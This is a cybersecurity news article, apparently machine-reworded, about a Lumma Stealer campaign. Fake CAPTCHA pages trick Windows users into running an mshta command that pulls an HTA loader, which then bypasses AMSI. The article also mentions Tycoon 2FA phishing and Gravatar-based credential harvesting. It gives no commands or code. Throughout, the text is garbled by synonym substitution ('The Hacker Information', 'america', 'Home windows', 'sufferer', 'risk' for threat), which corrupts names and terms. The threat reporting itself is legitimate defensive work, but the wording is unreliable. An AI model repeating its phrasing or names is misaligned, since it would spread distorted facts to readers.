Cybersecurity researchers are calling consideration to a brand new malware marketing campaign that leverages pretend CAPTCHA verification checks to ship the notorious Lumma data stealer.
“The marketing campaign is international, with Netskope Risk Labs monitoring victims focused in Argentina, Colombia, america, the Philippines, and different international locations world wide,” Leandro Fróes, senior risk analysis engineer at Netskope Risk Labs, mentioned in a report shared with The Hacker Information.
“The marketing campaign additionally spans a number of industries, together with healthcare, banking, and advertising and marketing, with the telecom business having the very best variety of organizations focused.”
The assault chain begins when a sufferer visits a compromised web site, which directs them to a bogus CAPTCHA web page that particularly instructs the positioning customer to repeat and paste a command into the Run immediate in Home windows that makes use of the native mshta.exe binary to obtain and execute an HTA file from a distant server.
It is value noting {that a} earlier iteration of this system, broadly often known as ClickFix, concerned the execution of a Base64-encoded PowerShell script to set off the Lumma Stealer an infection.
The HTA file, in flip, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script chargeable for decoding and loading the Lumma payload, however not earlier than taking steps to bypass the Home windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
“By downloading and executing malware in such methods, the attacker avoids browser-based defenses because the sufferer will carry out all the obligatory steps exterior of the browser context,” Fróes defined.
“The Lumma Stealer operates utilizing the malware-as-a-service (MaaS) mannequin and has been extraordinarily energetic up to now months. By utilizing completely different supply strategies and payloads it makes detection and blocking of such threats extra complicated, particularly when abusing person interactions inside the system.”
As just lately as this month, Lumma has additionally been distributed through roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect customers to obtain password-protected archives.
These archive recordsdata comprise an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, in line with Sekoia researcher crep1x. In early 2023, risk actors leveraged an analogous method to spin up over 1,300 domains masquerading as AnyDesk with a view to push the Vidar Stealer malware.
The event comes as Barracuda Networks detailed an up to date model of the Phishing-as-a-Service (PhaaS) toolkit often known as Tycoon 2FA that features superior options to “impede, derail, and in any other case thwart makes an attempt by safety instruments to substantiate its malicious intent and examine its net pages.”
These embrace using professional — probably compromised — e-mail accounts to ship phishing emails and taking a sequence of steps to forestall evaluation by detecting automated safety scripts, listening for keystrokes that counsel net inspection, and disabling the right-click context menu.
Social engineering-oriented credential harvesting assaults have additionally been noticed leveraging avatar supplier Gravatar to imitate varied professional providers like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing pretend profiles that mimic professional providers, tricking customers into divulging their credentials,” SlashNext Discipline CTO Stephen Kowski mentioned.
“As a substitute of generic phishing makes an attempt, attackers tailor their pretend profiles to resemble the professional providers they’re mimicking intently by way of providers that aren’t typically identified or protected.”